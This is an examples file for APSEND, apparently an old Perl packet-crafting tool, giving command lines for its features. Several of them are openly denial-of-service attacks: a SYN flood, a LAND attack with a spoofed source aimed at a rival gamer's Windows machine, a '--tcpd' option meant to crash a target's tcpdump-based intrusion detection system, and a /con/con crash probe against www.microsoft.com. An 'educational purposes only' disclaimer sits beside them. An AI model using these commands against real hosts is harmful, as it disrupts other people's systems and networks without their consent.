EXAMPLES:
---------

Well here are a few examples of how to use APSEND.
If you want to see all the possible options of APSEND, then try
apsend --help or have a look at the manpage (man apsend).


So here we go now:

1: Test if your firewall blocks synfloods

	apsend -s 0 -d localhost --syn-flood
   or:  apsend --source=0 -dest=localhost -syn -m 0
   or:  apsend -source 0 -destination localhost --syn --number 0

   As you can see APSEND supports both short and long command-line
   options. For more information about this, read the man page of
   the perl modul Getopt::Long (perldoc Getopt/Long).

2: Let's send a ping request to www.target.com

	apsend --source localhost --dest www.target.com -protocol 1 -i 8
   
   Easy, isn't it? We just specify the source and destination IP and the
   protocol (ICMP) using the ICMP protocol number (1) and the ICMP code
   for a ping request (8).

3: So you're playing quake on a lan party (you're using linux, all others
   use win) and there's one really good quake player you cannot kill...
   Well...perhaps you cannot kill him...but you CAN kill his win box...
   (I know DoS attacks are lame and normally I don't use them. I just
   implemented a few of them here for educational purposes only).

	apsend --source <spoofed-ip> --dest <quake player> --land -p 139

4: You're one of those 31337 hax0rs and wanna hack www.target.com but you
   know that they use a NIDS which is based on tcpdump. Well now you use
   the following command to crash their NIDS (or their whole system...):

	apsend --source <spoofed-ip> --dest www.target.com --tcpd

5: Let's open the port 31337 on your box and listen for incoming (tcp)
   connections (and print everything to STDOUT):

	apsend --listen 31337
   
   Well...now you get alot of shit, but you only want to get all the lines
   which match the word "microsoft". There are two possible solutions for
   this problem:

	apsend --listen 31337 | grep 'microsoft'
   or:  apsend --listen 31337 --regex 'microsoft'    (better solution) ;)

   OK...but you still get enough shit (about novell for example).
   So let's now try this:
   
	apsend --listen 31337 --regex 'microsoft' --nregex 'novell'
	
   And the same with UDP:

	apsend --listen 31337 -sop 17 --regex 'microsoft' --nregex 'novell'

7: Well...now we want to try, if Micro$oft fixed the /con/con exploit on
   www.microsoft.com :).

	apsend --connect 80 -d www.microsoft.com --data 'GET /con/con HTTP/1.0"
	
   Shit...they allready fixed it... :)
   
8: More examples in the next version :)


